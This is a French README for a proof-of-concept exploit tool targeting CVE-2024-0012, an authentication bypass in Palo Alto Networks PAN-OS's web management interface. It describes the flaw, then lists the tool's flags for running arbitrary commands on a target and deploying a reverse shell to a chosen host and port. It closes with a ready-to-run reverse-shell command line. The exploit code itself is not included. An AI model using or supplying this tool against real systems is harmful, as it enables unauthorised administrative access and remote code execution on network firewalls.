
CVE-2024-0012 PAN-OS : Contournement de l'authentification dans l'interface de gestion Web (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 est une bypass d'authentification dans le logiciel PAN-OS de Palo Alto Networks qui permet à un attaquant non authentifié ayant un accès réseau à l'interface de gestion web d'obtenir des privilèges d'administrateur PAN-OS pour effectuer des actions administratives, modifier la configuration ou exploiter d'autres vulnérabilités d'élévation de privilèges authentifiées.

| ❗ Avertissement |
|---|
| Ce projet est principalement conçu pour être utilisé comme un outil CLI autonome. Exécuter cet exploit en tant que service peut présenter des risques de sécurité. Il est recommandé de l'utiliser avec prudence et des mesures de sécurité supplémentaires. DWYOR |
python3 cve-2024-0012.py -h
Cela affichera l'aide pour l'outil. Voici tous les commutateurs qu'il prend en charge.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
Commande de shell inverse.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444